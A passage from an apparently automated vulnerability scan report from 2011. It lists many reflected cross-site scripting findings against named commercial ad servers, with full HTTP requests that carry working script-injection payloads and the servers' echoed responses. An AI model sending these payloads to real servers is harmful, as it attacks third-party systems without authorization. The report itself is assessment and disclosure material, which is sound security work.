xqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; pf=vcPDWdxa5bRnzYCFna8dt7hwFpEjJFamBf-ed9eCgkru2q8_Jo62qDoNU1sRcsTDbsXLbP8cgvu5kdFpiCdvW34lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15011%7C15011%7C15009%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C14983%7C15011%7C15003; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 04-Aug-2011 15:59:34 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 05 Feb 2011 15:59:33 GMT Content-Length: 546
4.2. http://ads.addynamix.com/creative/2-2126953-88j [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.addynamix.com
Path:
/creative/2-2126953-88j
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ca0'-alert(1)-'7a99b6b9948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /creative/2-2126953-88j??79ca0'-alert(1)-'7a99b6b9948=1 HTTP/1.1 Host: ads.addynamix.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UC=1.0.20050_0_1106.0; PI2126953_85=I4d4d644cJ2K2L0M2N1O15180
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:34 GMT Server: Apache Server-Index: i1 P3P: policyref="http://banners.pennyweb.com/w3c/p3p.xml",CP="NON STP DSP COR CUR TAI OUR STA" Pragma: no-cache Cache-Control: no-store,no-cache Set-Cookie: PI2126953_88=I4d4d73e6J63b0K77064L2eM1960dN1O15180; expires=Sun, 06-Feb-2011 15:59:34 GMT; path=/; domain=ads.addynamix.com Content-Length: 734 Connection: close Content-Type: text/html Expires: Sat, 05 Feb 2011 15:59:34 GMT
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5ca84<script>alert(1)</script>e6063e28591 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=W25t6coj820hSGmI5ca84<script>alert(1)</script>e6063e28591 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=223547500743A002098EB099848151AA; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 05 Feb 2011 15:59:33 GMT Connection: close
The value of the kvq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bb3a'-alert(1)-'39269acb9b9 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=9;itime=921573158;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDSCI728" target="_blank"> ...[SNIP]...
4.5. http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5c4f'-alert(1)-'8df45306b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=10;itime=921573573;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDGLITT728" target="_blank"> ...[SNIP]...
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db26e'-alert(1)-'0d3ee1d5280 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576db26e'-alert(1)-'0d3ee1d5280 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 302
4.7. http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1199874/0/16/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d4c'-alert(1)-'a66e2a6ecfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576&87d4c'-alert(1)-'a66e2a6ecfb=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 305
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d27a"-alert(1)-"23d787d5a6f was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b65766d27a"-alert(1)-"23d787d5a6f HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1454
4.9. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1200349/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1ea"-alert(1)-"2fbf835ceb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19251
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG"; var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5242/1201431/0/225/AdId=1283446;BnId=5;itime=920485366;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1;nodecode=yes;link=") + escape(AT_CLICK); var AT_FLASHVARSSTR= ""; // if use microsite, dont add the first parameter if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserv ...[SNIP]...
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c6'-alert(1)-'ba2d61c4899 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576ea3c6'-alert(1)-'ba2d61c4899 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 328
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c264a"-alert(1)-"99d36684df2 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576c264a"-alert(1)-"99d36684df2 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1135
4.12. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1200449/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72594'-alert(1)-'805f5bcf179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576&72594'-alert(1)-'805f5bcf179=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1144
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5308d'-alert(1)-'e15412e718f was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b65765308d'-alert(1)-'e15412e718f HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 302
4.14. http://adserver.adtechus.com/addyn/3.0/5242.1/1200533/0/16/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5242.1/1200533/0/16/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 718fe'-alert(1)-'ef1ab54d48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b6576&718fe'-alert(1)-'ef1ab54d48e=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 305
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fadbd"><script>alert(1)</script>a72a2aad66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframefadbd"><script>alert(1)</script>a72a2aad66/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 395
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4411"><script>alert(1)</script>ac47f18584 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0e4411"><script>alert(1)</script>ac47f18584/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 395
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad4"><script>alert(1)</script>a8e06f27e2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132a8ad4"><script>alert(1)</script>a8e06f27e2c/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7292a"><script>alert(1)</script>cdc932fa922 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
